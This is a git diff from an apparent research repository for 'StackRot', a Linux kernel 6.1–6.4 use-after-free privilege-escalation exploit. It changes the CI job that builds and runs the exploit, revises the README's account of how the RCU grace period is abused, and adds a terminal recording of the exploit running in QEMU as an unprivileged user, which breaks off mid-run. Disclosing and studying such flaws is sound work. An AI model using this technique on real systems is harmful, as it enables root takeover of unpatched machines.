diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 867638e..a1029c2 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,7 +20,9 @@ jobs: - name: Build the exploit run: make - name: Install QEMU - run: sudo apt-get install -y qemu-system-x86-64 + run: | + sudo apt-get update + sudo apt-get install -y qemu-system-x86-64 - name: Run the exploit id: test continue-on-error: true
diff --git a/README.md b/README.md
index cc196d5..1f87737 100644
--- a/README.md
+++ b/README.md
@@ -5,6 +5,8 @@ [ci]: https://github.com/lrh2000/StackRot/actions +![Demo](pic/demo.svg) + A flaw was found in the handling of stack expansion in the Linux kernel 6.1 through 6.4, aka "Stack Rot". The maple tree, responsible for managing virtual memory areas, can undergo node replacement without properly acquiring the MM
@@ -358,12 +360,11 @@ solutions are as follows: period will not end. 4. The iteration task is deliberately prolonged, allowing the RCU grace period to expire. This is the chosen solution. If the current RCU grace period - surpasses RCU_TASK_IPI_DELAY (defaulting to 0.5 seconds), inter-processor - interrupts (IPIs) are dispatched to all CPUs to verify that they are not in - RCU critical sections. In the case of VMA iteration, the answer is - negative, signifying that the RCU grace period concludes and the maple node - is freed, effectively converting UAFBR into a genuine use-after-free (UAF) - scenario. + surpasses `jiffies_till_first_fqs` (defaulting to several jiffies), an + inter-processor interrupt (IPI) will be dispatched to the victim CPU and + trigger voluntary preemption. In the case of VMA iteration, the voluntary + preemption can make the RCU grace period conclude and free the maple node, + effectively converting UAFBR into a genuine use-after-free (UAF) scenario. One significant observation is that during VMA iteration for `/proc/[pid]/maps`, it generates the entire file path for file-mapped memory 
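Review bot: The rewritten "Install QEMU" step in the .github/workflows/ci.yml hunk still installs the package with its recommended dependencies, which on a Debian/Ubuntu runner pulls in GUI and audio libraries that a headless QEMU run (the demo recording on this page launches it with `-nographic`) never uses and lengthens the job; `sudo apt-get install -y --no-install-recommends qemu-system-x86-64` keeps the install minimal. Adding `sudo apt-get update` before the install is the right fix for a stale package index on the runner image. Because the step is now a multi-line `run: |` block, the runner's default bash `-e` mode aborts the step if `apt-get update` fails, so no explicit `&&` chaining is needed. The job definition continues past this hunk.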
diff --git a/pic/demo.cast b/pic/demo.cast
new file mode 100644
index 0000000..fa23f8c
--- /dev/null
+++ b/pic/demo.cast 
@@ -0,0 +1,697 @@ +{"version": 2, "width": 160, "height": 43, "timestamp": 1716687998, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-kitty"}} +[0.116816, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"] +[0.132493, "o", "\u001b]0;ruihan@localhost: ~/projects/StackRot/exp\u0007"] +[0.170665, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\r\n\u001b[A\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m \u001b[0m\u001b[49m\u001b[38;5;31m \u001b[1m\u001b[38;5;31m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/projects/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mStackRot\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mexp\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m \u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;178m\u001b[39mon \u001b[0m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;178m \u001b[38;5;76m master \u001b[38;5;178m!2\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[38;5;178m\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[39m\u001b[38;5;244m·································································································\u001b[0m\u001b[38;5;244m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[38;5;66m\u001b[39mat \u001b[0m\u001b[49m\u001b[38;5;66m 09:46:38 AM\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[39m\r\n\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[30m\u001b[0m\u001b[30m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[?1h"] +[0.171026, "o", "\u001b[?2004h"] +[0.765343, "o", "q"] +[0.774779, "o", "\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m"] +[0.77618, "o", 
"\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m\u001b[90memu-system-x86_64 \\\u001b[39m\r\r\n\u001b[90m -m 3G -smp 2 -enable-kvm \\\u001b[39m\u001b[K\r\r\n\u001b[90m -kernel ../env/bzImage_upstream_6.1.25 \\\u001b[39m\u001b[K\r\r\n\u001b[90m -initrd ../env/initramfs.cpio.gz \\\u001b[39m\u001b[K\r\r\n\u001b[90m -append \"quiet console=ttyS0 panic_on_warn=1\" \\\u001b[39m\u001b[K\r\r\n\u001b[90m -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \\\u001b[39m\u001b[K\r\r\n\u001b[90m -nographic -no-reboot\u001b[39m\u001b[K\u001b[6A\u001b[26D"] +[0.954587, "o", "\b\u001b[1m\u001b[31mq\u001b[0m\u001b[39m\u001b[39me\u001b[39mm\u001b[39mu\u001b[39m-\u001b[39ms\u001b[39my\u001b[39ms\u001b[39mt\u001b[39me\u001b[39mm\u001b[39m-\u001b[39mx\u001b[39m8\u001b[39m6\u001b[39m_\u001b[39m6\u001b[39m4\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mm\u001b[39m \u001b[39m3\u001b[39mG\u001b[39m \u001b[39m-\u001b[39ms\u001b[39mm\u001b[39mp\u001b[39m \u001b[39m2\u001b[39m \u001b[39m-\u001b[39me\u001b[39mn\u001b[39ma\u001b[39mb\u001b[39ml\u001b[39me\u001b[39m-\u001b[39mk\u001b[39mv\u001b[39mm\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mk\u001b[39me\u001b[39mr\u001b[39mn\u001b[39me\u001b[39ml\u001b[39m \u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39mb\u001b[39mz\u001b[39mI\u001b[39mm\u001b[39ma\u001b[39mg\u001b[39me\u001b[39m_\u001b[39mu\u001b[39mp\u001b[39ms\u001b[39mt\u001b[39mr\u001b[39me\u001b[39ma\u001b[39mm\u001b[39m_\u001b[39m6\u001b[39m.\u001b[39m1\u001b[39m.\u001b[39m2\u001b[39m5\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mi\u001b[39mn\u001b[39mi\u001b[39mt\u001b[39mr\u001b[39md\u001b[39m 
\u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39mi\u001b[39mn\u001b[39mi\u001b[39mt\u001b[39mr\u001b[39ma\u001b[39mm\u001b[39mf\u001b[39ms\u001b[39m.\u001b[39mc\u001b[39mp\u001b[39mi\u001b[39mo\u001b[39m.\u001b[39mg\u001b[39mz\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39ma\u001b[39mp\u001b[39mp\u001b[39me\u001b[39mn\u001b[39md\u001b[39m \u001b[39m\"\u001b[39mq\u001b[39mu\u001b[39mi\u001b[39me\u001b[39mt\u001b[39m \u001b[39mc\u001b[39mo\u001b[39mn\u001b[39ms\u001b[39mo\u001b[39ml\u001b[39me\u001b[39m=\u001b[39mt\u001b[39mt\u001b[39my\u001b[39mS\u001b[39m0\u001b[39m \u001b[39mp\u001b[39ma\u001b[39mn\u001b[39mi\u001b[39mc\u001b[39m_\u001b[39mo\u001b[39mn\u001b[39m_\u001b[39mw\u001b[39ma\u001b[39mr\u001b[39mn\u001b[39m=\u001b[39m1\u001b[39m\"\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mv\u001b[39mi\u001b[39mr\u001b[39mt\u001b[39mf\u001b[39ms\u001b[39m \u001b[39ml\u001b[39mo\u001b[39mc\u001b[39ma\u001b[39ml\u001b[39m,\u001b[39mp\u001b[39ma\u001b[39mt\u001b[39mh\u001b[39m=\u001b[39m.\u001b[39m.\u001b[39m/\u001b[39me\u001b[39mn\u001b[39mv\u001b[39m/\u001b[39me\u001b[39mx\u001b[39mp\u001b[39m,\u001b[39mm\u001b[39mo\u001b[39mu\u001b[39mn\u001b[39mt\u001b[39m_\u001b[39mt\u001b[39ma\u001b[39mg\u001b[39m=\u001b[39me\u001b[39mx\u001b[39mp\u001b[39m,\u001b[39ms\u001b[39me\u001b[39mc\u001b[39mu\u001b[39mr\u001b[39mi\u001b[39mt\u001b[39my\u001b[39m_\u001b[39mm\u001b[39mo\u001b[39md\u001b[39me\u001b[39ml\u001b[39m=\u001b[39mn\u001b[39mo\u001b[39mn\u001b[39me\u001b[39m \u001b[39m\\\u001b[1B\r\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m-\u001b[39mn\u001b[39mo\u001b[39mg\u001b[39mr\u001b[39ma\u001b[39mp\u001b[39mh\u001b[39mi\u001b[39mc\u001b[39m 
\u001b[39m-\u001b[39mn\u001b[39mo\u001b[39m-\u001b[39mr\u001b[39me\u001b[39mb\u001b[39mo\u001b[39mo\u001b[39mt"] +[0.963453, "o", "\u001b[6A\u001b[27D\u001b[0m\u001b[32mq\u001b[32me\u001b[32mm\u001b[32mu\u001b[32m-\u001b[32ms\u001b[32my\u001b[32ms\u001b[32mt\u001b[32me\u001b[32mm\u001b[32m-\u001b[32mx\u001b[32m8\u001b[32m6\u001b[32m_\u001b[32m6\u001b[32m4\u001b[39m\u001b[2B\b\b\b\b\u001b[4m.\u001b[4m.\u001b[4m/\u001b[4me\u001b[4mn\u001b[4mv\u001b[4m/\u001b[4mb\u001b[4mz\u001b[4mI\u001b[4mm\u001b[4ma\u001b[4mg\u001b[4me\u001b[4m_\u001b[4mu\u001b[4mp\u001b[4ms\u001b[4mt\u001b[4mr\u001b[4me\u001b[4ma\u001b[4mm\u001b[4m_\u001b[4m6\u001b[4m.\u001b[4m1\u001b[4m.\u001b[4m2\u001b[4m5\u001b[24m\u001b[1B\u001b[30D\u001b[4m.\u001b[4m.\u001b[4m/\u001b[4me\u001b[4mn\u001b[4mv\u001b[4m/\u001b[4mi\u001b[4mn\u001b[4mi\u001b[4mt\u001b[4mr\u001b[4ma\u001b[4mm\u001b[4mf\u001b[4ms\u001b[4m.\u001b[4mc\u001b[4mp\u001b[4mi\u001b[4mo\u001b[4m.\u001b[4mg\u001b[4mz\u001b[24m\u001b[1B\u001b[24D\u001b[33m\"\u001b[33mq\u001b[33mu\u001b[33mi\u001b[33me\u001b[33mt\u001b[33m \u001b[33mc\u001b[33mo\u001b[33mn\u001b[33ms\u001b[33mo\u001b[33ml\u001b[33me\u001b[33m=\u001b[33mt\u001b[33mt\u001b[33my\u001b[33mS\u001b[33m0\u001b[33m \u001b[33mp\u001b[33ma\u001b[33mn\u001b[33mi\u001b[33mc\u001b[33m_\u001b[33mo\u001b[33mn\u001b[33m_\u001b[33mw\u001b[33ma\u001b[33mr\u001b[33mn\u001b[33m=\u001b[33m1\u001b[33m\"\u001b[39m\u001b[2B\u001b[24D"] +[2.351357, "o", "\u001b[?1l"] +[2.351592, "o", "\u001b[?2004l"] +[2.363004, "o", "\u001b[?25l\u001b[6A\r\r\u001b[A\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[27m\u001b[24m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[39m\u001b[27m\u001b[24m \u001b[32mqemu-system-x86_64\u001b[39m \\\u001b[K\r\r\n -m 3G -smp 2 -enable-kvm \\\u001b[K\r\r\n -kernel \u001b[4m../env/bzImage_upstream_6.1.25\u001b[24m \\\u001b[K\r\r\n -initrd \u001b[4m../env/initramfs.cpio.gz\u001b[24m \\\u001b[K\r\r\n -append \u001b[33m\"quiet console=ttyS0 
panic_on_warn=1\"\u001b[39m \\\u001b[K\r\r\n -virtfs local,path=../env/exp,mount_tag=exp,security_model=none \\\u001b[K\r\r\n -nographic -no-reboot\u001b[K\u001b[?25h\r\r\n"] +[2.3671, "o", "\u001b]0;ruihan@localhost: qemu-system-x86_64 -m 3G -smp 2 -enable-kvm -kernel -initrd -append -virtf\u0007"] +[2.51747, "o", "\u001bc\u001b[?7l\u001b[2J"] +[2.524479, "o", "\u001b[0mSeaBIOS"] +[2.524512, "o", " (ver"] +[2.524621, "o", "sion "] +[2.524835, "o", "Arch Linux "] +[2.524877, "o", "1.1"] +[2.52492, "o", "6."] +[2.524955, "o", "3-"] +[2.524991, "o", "1-"] +[2.525022, "o", "1"] +[2.528608, "o", ")\r\r\n\r\n\r\niPXE "] +[2.528769, "o", "(http://ipxe"] +[2.528913, "o", ".org) 00:03."] +[2.529071, "o", "0 C900 PCI2"] +[2.529115, "o", ".10 "] +[2.529146, "o", "Pn"] +[2.529311, "o", "P PM"] +[2.529451, "o", "M+BEFD318"] +[2.529581, "o", "0+BEF3318"] +[2.529655, "o", "0 C90"] +[2.529718, "o", "0\r\r\nP"] +[2.529781, "o", "ress "] +[2.529813, "o", "Ctr"] +[2.529843, "o", "l-"] +[2.529874, "o", "B t"] +[2.529913, "o", "o "] +[2.529944, "o", "con"] +[2.529977, "o", "fi"] +[2.530007, "o", "gur"] +[2.530038, "o", "e "] +[2.530066, "o", "iPX"] +[2.530097, "o", "E "] +[2.53013, "o", "(P"] +[2.530167, "o", "CI "] +[2.5302, "o", "00:"] +[2.53023, "o", "03"] +[2.530258, "o", ".0)"] +[2.530286, "o", ".."] +[2.530319, "o", ".\r"] +[2.530352, "o", " "] +[2.530392, "o", " "] +[2.530425, "o", " "] +[2.530456, "o", " "] +[2.530486, "o", " "] +[2.530516, "o", " "] +[2.530546, "o", " "] +[2.530578, "o", " "] +[2.530617, "o", " "] +[2.530649, "o", " "] +[2.530679, "o", " "] +[2.530708, "o", " "] +[2.530737, "o", " "] +[2.530767, "o", " "] +[2.530798, "o", " "] +[2.530834, "o", " "] +[2.530866, "o", " "] +[2.530897, "o", " "] +[2.530926, "o", " "] +[2.530954, "o", " "] +[2.530982, "o", " "] +[2.531013, "o", " "] +[2.531048, "o", " "] +[2.53108, "o", " "] +[2.531112, "o", " "] +[2.53114, "o", " "] +[2.531167, "o", " "] +[2.531202, "o", " "] +[2.531233, "o", " "] +[2.531268, "o", " "] 
+[2.531302, "o", " "] +[2.531332, "o", " "] +[2.534468, "o", " \r\r\n\r\n\r\nB"] +[2.534524, "o", "oot"] +[2.534557, "o", "in"] +[2.534584, "o", "g "] +[2.534653, "o", "fro"] +[2.534697, "o", "m R"] +[2.534728, "o", "OM"] +[2.534785, "o", ".."] +[2.538663, "o", "\u001bc\u001b[?"] +[2.538717, "o", "7l\u001b[2J"] +[3.335479, "o", "\r\r\nmount -t devtmpfs none /dev\r\r\n"] +[3.335532, "o", "mount -t proc no"] +[3.335697, "o", "ne /proc\r\r\n"] +[3.335985, "o", "mount -t sysfs "] +[3.335995, "o", "n"] +[3.336009, "o", "o"] +[3.336027, "o", "ne"] +[3.336056, "o", " "] +[3.336071, "o", "/sy"] +[3.336082, "o", "s"] +[3.336142, "o", "\r\r\n"] +[3.336524, "o", "mount -t tmp"] +[3.336536, "o", "fs "] +[3.336544, "o", "n"] +[3.336565, "o", "o"] +[3.336618, "o", "ne /tm"] +[3.336723, "o", "p\r\r\n"] +[3.336977, "o", "\r\r\n"] +[3.336997, "o", "m"] +[3.337017, "o", "k"] +[3.337032, "o", "dir"] +[3.337085, "o", " /tmp/exp"] +[3.337186, "o", "\r\r\n"] +[3.337355, "o", "m"] +[3.337394, "o", "ou"] +[3.337435, "o", "nt -t 9p exp "] +[3.337487, "o", "/tmp/e"] +[3.337529, "o", "xp\r\r\n"] +[3.338462, "o", "\r\r\nsu"] +[3.338476, "o", " gu"] +[3.338521, "o", "est /tmp/e"] +[3.338634, "o", "xp/ex"] +[3.338729, "o", "ploit.sh\r\r\n"] +[3.339406, "o", "\r\r\ne"] +[3.339467, "o", "xec /bin/"] +[3.339502, "o", "sh\r\r\n"] +[3.339654, "o", "/bin/s"] +[3.33972, "o", "h: can't ac"] +[3.33978, "o", "cess tty; jo"] +[3.339836, "o", "b control tu"] +[3.339893, "o", "rned off\r\r\n"] +[3.339961, "o", "/ $ "] +[3.34002, "o", "\u001b[6n"] +[4.625131, "o", "w"] +[4.758887, "o", "h"] +[4.828593, "o", "o"] +[5.021094, "o", "a"] +[5.154565, "o", "m"] +[5.299151, "o", "i"] +[5.53151, "o", "\r\r\n"] +[5.532616, "o", "guest"] +[5.532709, "o", "\r\r\n"] +[5.5333, "o", "/ $ \u001b[6n"] +[7.211004, "o", "l"] +[7.257954, "o", "s"] +[7.372687, "o", " "] +[7.516475, "o", "/"] +[7.64683, "o", "r"] +[7.762617, "o", "o"] +[7.889331, "o", "o"] +[7.935153, "o", "t"] +[8.02509, "o", " "] +[8.096305, "o", "-"] 
+[8.228157, "o", "a"] +[8.298099, "o", "l"] +[8.458985, "o", "\r\r\n"] +[8.460385, "o", "ls: can't o"] +[8.46048, "o", "pen '"] +[8.46085, "o", "/root': Perm"] +[8.460907, "o", "is"] +[8.460982, "o", "si"] +[8.461036, "o", "on"] +[8.461119, "o", " "] +[8.46117, "o", "deni"] +[8.461222, "o", "ed"] +[8.461692, "o", "\r\r\ntotal 0\r\r\n"] +[8.462297, "o", "/ $ \u001b[6n"] +[9.554346, "o", "c"] +[9.632116, "o", "a"] +[9.797209, "o", "t"] +[9.862369, "o", " "] +[9.98996, "o", "/"] +[10.10625, "o", "r"] +[10.214157, "o", "o"] +[10.34225, "o", "o"] +[10.417478, "o", "t"] +[10.587181, "o", "/"] +[10.716165, "o", "f"] +[10.859593, "o", "l"] +[10.914587, "o", "a"] +[11.035834, "o", "g"] +[11.174126, "o", "\r\r\n"] +[11.175091, "o", "cat: can't open "] +[11.175264, "o", "'/root/flag': "] +[11.175378, "o", "Pe"] +[11.175972, "o", "rmission denied\r\r\n"] +[11.176482, "o", "/ $"] +[11.176519, "o", " \u001b[6n"] +[14.233578, "o", "/"] +[14.439453, "o", "t"] +[14.533719, "o", "m"] +[14.700786, "o", "p"] +[14.937766, "o", "/"] +[15.053008, "o", "e"] +[15.240559, "o", "x"] +[15.335884, "o", "p"] +[15.552946, "o", "/"] +[15.665568, "o", "e"] +[15.847029, "o", "x"] +[15.964125, "o", "p"] +[16.117963, "o", "l"] +[16.284625, "o", "o"] +[16.380198, "o", "i"] +[16.482519, "o", "t"] +[17.35005, "o", "\r\r\n"] +[17.354879, "o", "\u001b[0m[ ] "] +[17.354953, "o", "Creatin"] +[17.355252, "o", "g "] +[17.355302, "o", "a very deep f"] +[17.355347, "o", "il"] +[17.355653, "o", "e: 0/"] +[17.355913, "o", "65536"] +[17.356193, "o", "\r\r\n"] +[17.382317, "o", "\u001b[0m[ ] Creating"] +[17.382591, "o", " a very deep file"] +[17.382628, "o", ": 4096/65536\r\r\n"] +[17.397153, "o", "\u001b[0m[ ] Creating"] +[17.397188, "o", " a ve"] +[17.397199, "o", "ry"] +[17.397221, "o", " d"] +[17.397239, "o", "e"] +[17.397251, "o", "ep"] +[17.397263, "o", " f"] +[17.397291, "o", "il"] +[17.397598, "o", "e: 8192/65536\r\r\n"] +[17.412258, "o", "\u001b[0m[ ] Creating"] +[17.412279, "o", " "] +[17.412289, "o", 
"a"] +[17.412307, "o", " v"] +[17.412324, "o", "e"] +[17.412336, "o", "ry"] +[17.412347, "o", " "] +[17.412359, "o", "de"] +[17.412377, "o", "e"] +[17.412388, "o", "p "] +[17.412707, "o", "file: 12288/65536\r\r\n"] +[17.42823, "o", "\u001b[0m[ ] Creating"] +[17.428352, "o", " a ve"] +[17.428364, "o", "r"] +[17.428379, "o", "y "] +[17.428468, "o", "deep fil"] +[17.428493, "o", "e:"] +[17.428699, "o", " 16384/6"] +[17.428711, "o", "5536\r\r\n"] +[17.443438, "o", "\u001b[0m[ ] Creating a"] +[17.44346, "o", " ver"] +[17.443478, "o", "y"] +[17.44349, "o", " d"] +[17.443512, "o", "e"] +[17.443523, "o", "ep"] +[17.443536, "o", " "] +[17.443546, "o", "f"] +[17.443557, "o", "il"] +[17.443886, "o", "e: 20480/65536\r\r\n"] +[17.458929, "o", "\u001b[0m[ "] +[17.458953, "o", "] Creat"] +[17.458967, "o", "ing"] +[17.459119, "o", " a very de"] +[17.459133, "o", "ep"] +[17.459145, "o", " f"] +[17.459163, "o", "i"] +[17.459183, "o", "l"] +[17.459386, "o", "e: 24576/6553"] +[17.459439, "o", "6\r\r\n"] +[17.475016, "o", "\u001b[0m[ ] Creating"] +[17.475039, "o", " a v"] +[17.47505, "o", "er"] +[17.475067, "o", "y "] +[17.475091, "o", "d"] +[17.475102, "o", "ee"] +[17.475115, "o", "p "] +[17.475131, "o", "f"] +[17.475142, "o", "il"] +[17.475249, "o", "e: 28672/"] +[17.475438, "o", "65536\r\r\n"] +[17.490173, "o", "\u001b[0m[ ] Creating"] +[17.490218, "o", " a ver"] +[17.490306, "o", "y "] +[17.490325, "o", "deep file"] +[17.490341, "o", ": "] +[17.490518, "o", "32768/65536"] +[17.49053, "o", "\r\r\n"] +[17.506033, "o", "\u001b[0m[ ] Cr"] +[17.506064, "o", "eating"] +[17.506205, "o", " a ve"] +[17.506252, "o", "ry deep "] +[17.506267, "o", "fil"] +[17.50628, "o", "e:"] +[17.506293, "o", " "] +[17.50645, "o", "36864"] +[17.506509, "o", "/65536\r\r\n"] +[17.521932, "o", "\u001b[0m[ ] Creating"] +[17.522016, "o", " a very dee"] +[17.522029, "o", "p "] +[17.52211, "o", "file: 409"] +[17.52212, "o", "6"] +[17.522133, "o", "0"] +[17.522144, "o", "/"] +[17.522165, "o", "6"] +[17.522177, "o", 
"553"] +[17.522354, "o", "6\r\r\n"] +[17.537208, "o", "\u001b[0m[ ] Creating"] +[17.537236, "o", " a very d"] +[17.537281, "o", "eep fi"] +[17.537378, "o", "l"] +[17.537527, "o", "e: 45056/65536\r\r\n"] +[17.552094, "o", "\u001b[0m[ ] Creating"] +[17.552129, "o", " "] +[17.55214, "o", "a"] +[17.552153, "o", " "] +[17.552171, "o", "v"] +[17.552189, "o", "er"] +[17.55225, "o", "y "] +[17.552266, "o", "deep f"] +[17.552427, "o", "il"] +[17.55244, "o", "e: 49152/65536\r"] +[17.552452, "o", "\r\n"] +[17.56693, "o", "\u001b[0m[ ] Creating"] +[17.566984, "o", " a ve"] +[17.567002, "o", "ry"] +[17.567015, "o", " "] +[17.567075, "o", "deep fi"] +[17.56709, "o", "l"] +[17.567255, "o", "e: 53248/65"] +[17.567305, "o", "536\r\r\n"] +[17.581394, "o", "\u001b[0m[ ] Creating"] +[17.581412, "o", " a"] +[17.581423, "o", " "] +[17.581434, "o", "v"] +[17.581448, "o", "e"] +[17.58146, "o", "ry"] +[17.581479, "o", " d"] +[17.581493, "o", "ee"] +[17.581684, "o", "p fil"] +[17.581727, "o", "e: 57344/65536\r\r\n"] +[17.596298, "o", "\u001b[0m[ ] Creating"] +[17.596328, "o", " "] +[17.596338, "o", "a"] +[17.59635, "o", " v"] +[17.596372, "o", "e"] +[17.596386, "o", "ry "] +[17.596397, "o", "d"] +[17.596458, "o", "eep fil"] +[17.596615, "o", "e: 61440/65536\r\r\n"] +[17.610728, "o", "\u001b[32m"] +[17.610745, "o", "[+] Creat"] +[17.610755, "o", "e"] +[17.610766, "o", "d"] +[17.610998, "o", " "] +[17.611013, "o", "th"] +[17.611054, "o", "e"] +[17.611112, "o", " "] +[17.611158, "o", "d"] +[17.611198, "o", "eep"] +[17.611261, "o", " "] +[17.6113, "o", "fi"] +[17.611381, "o", "l"] +[17.611423, "o", "e\r\r\n"] +[17.814919, "o", "\u001b[0m[ ]"] +[17.815083, "o", " Trying w"] +[17.815733, "o", "it"] +[17.815828, "o", "h free_timing_"] +[17.816228, "o", "msec="] +[17.816298, "o", "0"] +[17.816643, "o", "\r\r\n"] +[17.830253, "o", "\u001b[0m[ ] UAF"] +[17.830362, "o", " stat"] +[17.830426, "o", "e "] +[17.830504, "o", "update: \""] +[17.830584, "o", "free\""] +[17.830649, "o", " has"] +[17.830716, 
"o", " bee"] +[17.830774, "o", "n co"] +[17.830831, "o", "mple"] +[17.83137, "o", "ted\r\r\n"] +[17.918318, "o", "\u001b[0m[ ] UAF state update: \"use\" has been completed"] +[17.918367, "o", "\r\r\n"] +[17.94395, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\01"] +[17.944, "o", "2\\012\\012v\\012\\"] +[17.944065, "o", "012a\\"] +[17.944301, "o", "012\\012yo\\012\\012\\012\\012\\012k\\012\\012o\\012\\012\\012h\\012j\\"] +[17.944326, "o", "012\\01"] +[17.944445, "o", "2\\012\\012ia\\012\\012\\012jp"] +[17.94458, "o", "\\012\\012\\012\\012k\\012f\\012"] +[17.944627, "o", "g\\012\\012\\01"] +[17.944663, "o", "2\\0"] +[17.944705, "o", "12\\012\\01"] +[17.944743, "o", "2\\012om"] +[17.94478, "o", "\\012ti\\01"] +[17.944817, "o", "2\\012\\0"] +[17.944829, "o", "12\\012f\\0"] +[17.944884, "o", "12"] +[17.944921, "o", "\\012u\\012\\0"] +[17.94496, "o", "12g\\012\\"] +[17.944974, "o", "012o\\012"] +[17.945023, "o", "y\\0"] +[17.94506, "o", "12p\\012\\01"] +[17.945074, "o", "2\\012c\\0"] +[17.945123, "o", "12q\\012\\01"] +[17.945156, "o", "2\\0"] +[17.945189, "o", "12\\012"] +[17.94523, "o", "cf\\012\\0"] +[17.945244, "o", "12p\\012"] +[17.945257, "o", "t\\0"] +[17.945333, "o", "12\\012\\012\\"] +[17.945371, "o", "012\\012\\"] +[17.945387, "o", "012\\012i\\"] +[17.945431, "o", "012g\\012\\"] +[17.945464, "o", "012"] +[17.945476, "o", "rdu\\0"] +[17.945487, "o", "12s"] +[17.945563, "o", "cq\\01"] +[17.945604, "o", "2\\012etbq\\012\\"] +[17.945641, "o", "012\\012\\0"] +[17.945652, "o", "12\\012"] +[17.945702, "o", "\r\r\n0007"] +[17.945716, "o", "e000"] +[17.945773, "o", "-00"] +[17.945785, "o", "07f000 rw-p"] +[17.945833, "o", " 00000000 "] +[17.945867, "o", "0"] +[17.9459, "o", "0:00 0 "] +[17.945916, "o", "\r\r\n00"] +[17.945965, "o", "07f000-0008"] +[17.945999, "o", "100"] +[17.946031, "o", "0 rw-p"] +[17.946064, "o", " 0000000"] +[17.946105, "o", "0 00:"] +[17.946117, "o", "00 0 \r\r\n"] +[17.946166, "o", "ffffffff"] +[17.946198, "o", 
"ff6"] +[17.946209, "o", "00000"] +[17.946262, "o", "-f"] +[17.946273, "o", "fffffffff6010"] +[17.946326, "o", "0"] +[17.946363, "o", "0 --xp 00000"] +[17.9464, "o", "000 0"] +[17.946436, "o", "0:00 0 "] +[17.946474, "o", " "] +[17.94651, "o", " "] +[17.946524, "o", "[vsysca"] +[17.946569, "o", "ll]\r\r\n"] +[17.946601, "o", "\r"] +[17.946615, "o", "\r\n\u001b[31"] +[17.946663, "o", "m[-] Unsucc"] +[17.946704, "o", "e"] +[17.94674, "o", "ssful exp"] +[17.946777, "o", "loit tr"] +[17.946814, "o", "ial: Mem"] +[17.946852, "o", "ory maps"] +[17.946888, "o", " contai"] +[17.946902, "o", "n the fo"] +[17.946948, "o", "urth line"] +[17.946985, "o", "\r\r\n"] +[17.948353, "o", "\u001b[32"] +[17.948374, "o", "m[+]"] +[17.948389, "o", " H"] +[17.948458, "o", "ealcheck pa"] +[17.948495, "o", "sse"] +[17.948511, "o", "d: \"Use\""] +[17.948615, "o", " happens after \""] +[17.94878, "o", "free\"\r\r\n\u001b[0m[ ] Trying with free_timing_"] +[17.948925, "o", "msec=50\r\r\n"] +[18.00679, "o", "\u001b[0m[ ] UAF state update: \"free\" has been completed\r\r\n"] +[18.030714, "o", "\u001b[0m[ ] UAF state update: \"use\" has been completed\r\r\n"] +[18.056084, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\012\\012\\012"] +[18.05613, "o", "v\\012\\012a\\012"] +[18.056284, "o", "\\012yo\\"] +[18.056327, "o", "012\\012\\012\\012\\012k\\012\\012o\\012\\012"] +[18.05636, "o", "\\012h\\"] +[18.056394, "o", "012j\\012\\"] +[18.05643, "o", "012\\"] +[18.056456, "o", "012\\012ia"] +[18.05649, "o", "\\012\\0"] +[18.056516, "o", 